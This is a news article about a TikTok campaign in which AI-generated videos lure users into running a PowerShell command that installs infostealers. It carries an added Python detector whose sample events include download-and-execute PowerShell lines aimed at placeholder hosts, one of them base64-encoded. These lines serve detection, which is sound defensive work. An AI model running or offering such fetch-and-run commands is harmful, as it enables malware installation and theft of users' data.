Scammers Utilized AI-Generated Videos to Entice TikTok Users into Downloading Malware


Cybercriminals Are Using AI-Created TikTok Clips to Spread Malware

A new and concerning trend in social engineering has surfaced on TikTok, with cybercriminals exploiting the platform’s widespread appeal to spread malware via misleading videos.

Cybersecurity researchers at Trend Micro have reported that attackers have launched a “unique social engineering initiative” that uses TikTok videos to trick users into installing harmful software. These clips, thought to be AI-generated, falsely promise free access to premium software such as Microsoft Windows, Microsoft Office, CapCut, and Spotify.

The scam works by directing viewers to run a simple PowerShell command, presented as a legitimate way to activate software. Running the command actually loads malware, specifically infostealers like Vidar and StealC, onto the victim’s device. This malware is designed to steal sensitive data such as passwords, browser history, and cryptocurrency wallet information.

Bleeping Computer noted that numerous videos promoting this scam had already accumulated hundreds of thousands of views.

PowerShell is a powerful scripting language used to automate tasks on Windows devices. Because it is so capable, it poses significant risks when misused. Users are strongly advised to be cautious about any code or software suggestions they encounter on social media sites like TikTok.

Trend Micro highlighted the complexity of this campaign in its findings, noting that the harmful instructions are communicated solely through visuals and audio. “The social engineering takes place within the video itself, rather than through identifiable code or scripts,” the report states. “No malicious code is present on the platform for security solutions to scrutinize or block. All actionable content is conveyed visually and auditorily. Threat actors do this to try to circumvent existing detection methods, making it more challenging for defenders to identify and thwart these campaigns.”
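Because the lure itself carries no code, detection has to happen on the device where the command is typed. The following added example is not from Trend Micro's report or this article: it checks process-creation events for a user-started PowerShell that fetches remote content and runs it as code. The event fields, the indicator patterns and the shape of the command are assumptions, since the article does not show the command.

```python
import base64
import re

# Assumed indicators: the article does not show the command used in the videos.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
RUN = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def expand(command_line):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    match = ENCODED.search(command_line)
    if not match:
        return command_line
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or bad UTF-16: keep the raw command line
        return command_line
    return command_line + " " + decoded

def assess(event):
    """Return the reasons a process-creation event resembles the lure command."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    text = expand(event["command_line"])
    reasons = []
    if FETCH.search(text) and URL.search(text):
        reasons.append("fetches remote content")
    if RUN.search(text):
        reasons.append("runs a string as code")
    if event["parent"].lower() in USER_PARENTS:
        reasons.append("started from the user's desktop session")
    return reasons

def alerts(events):
    """Alert only when all three signals appear together."""
    return [e["id"] for e in events if len(assess(e)) == 3]

def encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed events, not taken from the article; hosts use the reserved .example TLD.
SAMPLE_EVENTS = [dict(id=i, parent=p, image=PS, command_line=c) for i, p, c in [
    (1, "explorer.exe", 'powershell.exe -Command "iex (irm https://activate.example/office)"'),
    (2, "explorer.exe", "powershell -NoProfile -enc " + encode("irm https://activate.example/app | iex")),
    (3, "svchost.exe", r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    (4, "explorer.exe", "powershell.exe Invoke-WebRequest https://downloads.example/tool.zip -OutFile tool.zip"),
]]
```

Requiring all three signals keeps the scheduled script (event 3) and the plain file download (event 4) out of the alert list while still catching the base64-encoded variant (event 2).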

While TikTok opted not to comment specifically on this threat, the company confirmed to Mashable that it has shut down the accounts associated with the campaign. Users concerned about scams and phishing efforts can find additional information and safety advice at the TikTok Safety Center.

Update: As of May 23, 2025, 5:22 p.m. EDT, this article has been revised to specify that the scam videos have been removed from the platform.